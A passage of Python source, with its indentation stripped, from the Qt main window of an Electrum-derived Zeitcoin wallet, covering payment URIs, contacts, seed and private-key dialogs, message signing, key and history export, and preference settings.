self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.emit(SIGNAL('payment_request_ok'))
else:
self.emit(SIGNAL('payment_request_error'))
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(unicode(URI), self.on_pr)
except BaseException as e:
self.show_error(_('Invalid Zeitcoin URI:') + '\n' + str(e))
return
self.tabs.setCurrentIndex(1)
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fee_e]:
e.setText('')
e.setFrozen(False)
self.set_pay_from([])
self.rbf_checkbox.setChecked(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.update_fee()
def create_list_tab(self, l):
w = QWidget()
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setMargin(0)
vbox.setSpacing(0)
vbox.addWidget(l)
buttons = QWidget()
vbox.addWidget(buttons)
return w
def create_addresses_tab(self):
from address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_address(addr)
self.address_list.update()
self.history_list.update()
def edit_account_label(self, k):
text, ok = QInputDialog.getText(self, _('Rename account'), _('Name') + ':', text = self.wallet.labels.get(k,''))
if ok:
label = unicode(text)
self.wallet.set_label(k,label)
self.address_list.update()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
domain = self.wallet.get_addresses()
return self.wallet.get_spendable_coins(domain)
def send_from_addresses(self, addrs):
self.set_pay_from(addrs)
self.tabs.setCurrentIndex(1)
self.update_fee()
def paytomany(self):
self.tabs.setCurrentIndex(1)
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.tabs.setCurrentIndex(1)
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_valid(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove %s from your list of contacts?")
% " + ".join(labels)):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Expires") + ':'), 1, 0)
grid.addWidget(QLabel(format_time(pr.get_expiration_date())), 1, 1)
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
grid.addWidget(QLabel(_("Payment URL") + ':'), 4, 0)
grid.addWidget(QLabel(pr.payment_url), 4, 1)
grid.addWidget(QLabel(_("Outputs") + ':'), 5, 0)
outputs_str = '\n'.join(map(lambda x: x[1] + ' ' + self.format_amount(x[2]) + ' ' + self.base_unit(), pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 5, 1)
if pr.tx:
grid.addWidget(QLabel(_("Transaction ID") + ':'), 6, 0)
l = QLineEdit(pr.tx)
l.setReadOnly(True)
grid.addWidget(l, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
return
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'zeitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), self.run_network_dialog )
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from password_dialog import PasswordDialog, PW_CHANGE
msg = (_('Your wallet is encrypted. Use this dialog to change your '
'password. To disable wallet encryption, enter an empty new '
'password.') if self.wallet.has_password()
else _('Your wallet keys are not encrypted'))
d = PasswordDialog(self, self.wallet, msg, PW_CHANGE)
ok, password, new_password = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password)
except BaseException as e:
self.show_error(str(e))
return
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('This wallet is not encrypted')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
i = self.tabs.currentIndex()
if i == 0:
self.history_list.filter(t, [2, 3, 4]) # Date, Description, Amount
elif i == 1:
self.invoice_list.filter(t, [0, 1, 2, 3]) # Date, Requestor, Description, Amount
elif i == 2:
self.request_list.filter(t, [0, 1, 2, 3, 4]) # Date, Account, Address, Description, Amount
elif i == 3:
self.address_list.filter(t, [0,1, 2]) # Address, Label, Balance
elif i == 4:
self.contact_list.filter(t, [0, 1]) # Key, Value
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(unicode(line2.text()), str(line1.text()))
def show_master_public_keys(self):
dialog = WindowModalDialog(self, "Master Public Keys")
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(100)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(i+1)
return ''
labels = [ label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
def show_public_keys(self, address):
if not address: return
try:
pubkey_list = self.wallet.get_public_keys(address)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
d = WindowModalDialog(self, _("Public key"))
d.setMinimumSize(600, 200)
vbox = QVBoxLayout()
vbox.addWidget( QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Public key") + ':'))
keys_e = ShowQRTextEdit(text='\n'.join(pubkey_list))
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk_list = self.wallet.get_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 200)
vbox = QVBoxLayout()
vbox.addWidget( QLabel(_("Address") + ': ' + address))
vbox.addWidget( QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text='\n'.join(pk_list))
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
@protected
def do_sign(self, address, message, signature, password):
message = unicode(message.toPlainText()).encode('utf-8')
task = partial(self.wallet.sign_message, str(address.text()),
message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
message = unicode(message.toPlainText())
message = message.encode('utf-8')
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address.text(), sig, message)
except:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(410, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
cyphertext = str(encrypted_e.toPlainText())
task = partial(self.wallet.decrypt_message, str(pubkey_e.text()),
cyphertext, password)
self.wallet.thread.add(task, on_success=message_e.setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = unicode(message_e.toPlainText())
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, str(pubkey_e.text()))
encrypted_e.setText(encrypted)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address = ''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
sequence = self.wallet.get_address_index(address)
pubkey = self.wallet.get_pubkey(*sequence)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
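# Modal password prompt; returns the entered password as a unicode string, or
# None if the dialog was cancelled.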
def password_dialog(self, msg=None, parent=None):
parent = parent or self
d = WindowModalDialog(parent, _("Enter Password"))
pw = QLineEdit()
pw.setEchoMode(QLineEdit.Password)
vbox = QVBoxLayout()
if not msg:
msg = _('Please enter your password')
vbox.addWidget(QLabel(msg))
grid = QGridLayout()
grid.setSpacing(8)
grid.addWidget(QLabel(_('Password')), 1, 0)
grid.addWidget(pw, 1, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
d.setLayout(vbox)
run_hook('password_dialog', pw, grid, 1)
if not d.exec_(): return
return unicode(pw.text())
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str, Transaction
try:
tx = tx_from_str(txt)
return Transaction(tx)
except:
traceback.print_exc(file=sys.stdout)
self.show_critical(_("Electrum was unable to parse your transaction"))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_qr(self.config)
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if data.startswith("zeitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
# transactions are binary, but qrcode seems to return utf8...
data = data.decode('utf8')
z = bitcoin.base_decode(data, length=None, base=43)
data = ''.join(chr(ord(b)) for b in z).encode('hex')
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
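# Private keys are derived in a background thread (one address at a time, with
# a short sleep between them) and streamed into the dialog through custom Qt
# signals; closing the dialog sets 'done' to stop the thread.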
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
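# The private keys are derived on a background thread so the per-address
# derivation does not block the Qt event loop; progress is reported through the
# 'computing_privkeys'/'show_privkeys' signals below, and the `done` flag lets
# the thread stop early if the dialog is cancelled.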
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done:
break
private_keys[addr] = "\n".join(self.wallet.get_private_key(addr, password))
d.emit(SIGNAL('computing_privkeys'))
d.emit(SIGNAL('show_privkeys'))
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
d.connect(d, QtCore.SIGNAL('computing_privkeys'), lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
d.connect(d, QtCore.SIGNAL('show_privkeys'), show_privkeys)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
f = open(labelsFile, 'r')
data = f.read()
f.close()
for key, value in json.loads(data).items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to import your labels.") + "\n" + str(reason))
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electrum_labels.json', "*.json")
if fileName:
with open(fileName, 'w+') as f:
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels where exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electrum-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("Electrum was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.get_history()
lines = []
for item in history:
tx_hash, height, confirmations, timestamp, value, balance = item
if height>0:
if timestamp is not None:
time_string = format_time(timestamp)
else:
time_string = _("unverified")
else:
time_string = _("unconfirmed")
if value is not None:
value_string = format_satoshis(value, True)
else:
value_string = '--'
if tx_hash:
label = wallet.get_label(tx_hash)
label = label.encode('utf-8')
else:
label = ""
if is_csv:
lines.append([tx_hash, label, confirmations, value_string, time_string])
else:
lines.append({'txid':tx_hash, 'date':"%16s"%time_string, 'label':label, 'value':value_string})
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"])
for line in lines:
transaction.writerow(line)
else:
import json
f.write(json.dumps(lines, indent = 4))
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = QTextEdit()
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet(BLACK_FG if get_address() else RED_FG)
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
tx = self.wallet.sweep(get_pk(), self.network, self.config, get_address(), None)
if not tx:
self.show_message(_('No inputs found. (Note that inputs need to be confirmed)'))
return
self.warn_if_watching_only()
self.show_transaction(tx)
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'))
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_key(x, password))
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(languages.values())
try:
index = languages.keys().index(self.config.get("language",''))
except Exception:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = languages.keys()[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = _('Fee per kilobyte of transaction.')
fee_label = HelpLabel(_('Transaction fee per kb') + ':', msg)
fee_e = BTCkBEdit(self.get_decimal_point)
def on_fee(is_done):
if self.config.get('dynamic_fees', True):
return
v = fee_e.get_amount() or 0
self.config.set_key('fee_per_kb', v, is_done)
self.update_fee()
fee_e.editingFinished.connect(lambda: on_fee(True))
fee_e.textEdited.connect(lambda: on_fee(False))
fee_widgets.append((fee_label, fee_e))
dynfee_cb = QCheckBox(_('Use dynamic fees'))
dynfee_cb.setChecked(self.config.get('dynamic_fees', True))
dynfee_cb.setToolTip(_("Use a fee per kB value recommended by the server."))
fee_widgets.append((dynfee_cb, None))
def update_feeperkb():
fee_e.setAmount(self.config.get('fee_per_kb', bitcoin.RECOMMENDED_FEE))
b = self.config.get('dynamic_fees', True)
fee_e.setEnabled(not b)
def on_dynfee(x):
self.config.set_key('dynamic_fees', x == Qt.Checked)
update_feeperkb()
self.update_fee_edit()
dynfee_cb.stateChanged.connect(on_dynfee)
update_feeperkb()
#slider_moved()
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet(GREEN_BG if validated else RED_BG)
else:
alias_e.setStyleSheet(RED_BG)
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.connect(self, SIGNAL('alias_received'), set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet(RED_BG if SSL_error else GREEN_BG if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['ZEIT', 'bits']
msg = _('Base unit of your wallet.')\
+ '\n1 ZEIT = 1,000,000 bits.\n' \
+ _('These settings affect the fields in the Send tab') + ' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
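# Changing the base unit only changes the display precision: decimal_point 8
# renders amounts in ZEIT, decimal_point 2 in bits (1 ZEIT = 1,000,000 bits);
# amounts already typed into the edits are re-rendered in the new unit.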
def on_unit(x):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e, fee_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'ZEIT':
self.decimal_point = 8
elif unit_result == 'bits':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(on_unit)
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(block_explorer_info.keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.\nOn linux, type: 'apt-get install python-zbar'")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.zbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", str(qr_combo.itemData(x).toString()), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
use_rbf = self.config.get('use_rbf', False)
